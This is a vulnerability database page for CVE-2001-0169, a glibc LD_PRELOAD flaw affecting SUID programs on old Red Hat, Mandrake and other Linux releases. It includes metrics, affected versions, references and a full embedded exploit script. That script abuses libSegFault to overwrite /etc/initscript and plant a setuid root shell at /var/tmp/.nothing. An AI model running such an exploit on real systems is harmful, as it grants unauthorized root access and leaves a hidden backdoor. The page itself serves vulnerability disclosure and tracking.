CVE-2001-0169 : Detail

CVE-2001-0169

0.04%V3
Local
2001-05-07
02h00 +00:00
2004-09-02
07h00 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

When using the LD_PRELOAD environmental variable in SUID or SGID applications, glibc does not verify that preloaded libraries in /etc/ld.so.cache are also SUID/SGID, which could allow a local user to overwrite arbitrary files by loading a library from /lib or /usr/lib.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 2.1 AV:L/AC:L/Au:N/C:N/I:P/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 290

Publication date : 2001-03-03 23h00 +00:00
Author : Shadow
EDB Verified : Yes

#!/bin/tcsh # przyklad wykorzystania dziury w LD_PRELOAD # shadow (tested on redhat 6.0, should work on others) if ( -e /etc/initscript ) echo uwaga: /etc/initscript istnieje cd /lib umask 0 setenv LD_PRELOAD libSegFault.so setenv SEGFAULT_OUTPUT_NAME /etc/initscript echo czekaj... to moze chwile potrwac... while (! -e /etc/initscript ) ( userhelper >& /dev/null & ; killall -11 userhelper >& /dev/null ) > /dev/null end echo utworzylem plik initscript cat > /etc/initscript << _init_ cp /bin/bash /var/tmp/.nothing chmod 6755 /var/tmp/.nothing rm /etc/initscript _init_ echo i nawet go podmienilem # milw0rm.com [2001-03-04]

Products Mentioned

Configuraton 0

Mandrakesoft>>Mandrake_linux >> Version 6.0

Mandrakesoft>>Mandrake_linux >> Version 6.1

Mandrakesoft>>Mandrake_linux >> Version 7.0

Mandrakesoft>>Mandrake_linux >> Version 7.1

Mandrakesoft>>Mandrake_linux >> Version 7.2

Mandrakesoft>>Mandrake_linux_corporate_server >> Version 1.0.1

Redhat>>Linux >> Version 6.0

    Redhat>>Linux >> Version 6.0

      Redhat>>Linux >> Version 6.0

        Redhat>>Linux >> Version 6.1

          Redhat>>Linux >> Version 6.1

            Redhat>>Linux >> Version 6.1

              Redhat>>Linux >> Version 6.2

                Redhat>>Linux >> Version 6.2

                  Redhat>>Linux >> Version 6.2

                    Trustix>>Secure_linux >> Version 1.1

                    Trustix>>Secure_linux >> Version 1.2

                    Turbolinux>>Turbolinux >> Version To (including) 6.0.5

                      Turbolinux>>Turbolinux >> Version 6.1

                        References

                        http://www.debian.org/security/2001/dsa-039
                        Tags : vendor-advisory, x_refsource_DEBIAN
                        http://www.securityfocus.com/bid/2223
                        Tags : vdb-entry, x_refsource_BID
                        http://www.securityfocus.com/archive/1/157650
                        Tags : mailing-list, x_refsource_BUGTRAQ
                        http://www.redhat.com/support/errata/RHSA-2001-002.html
                        Tags : vendor-advisory, x_refsource_REDHAT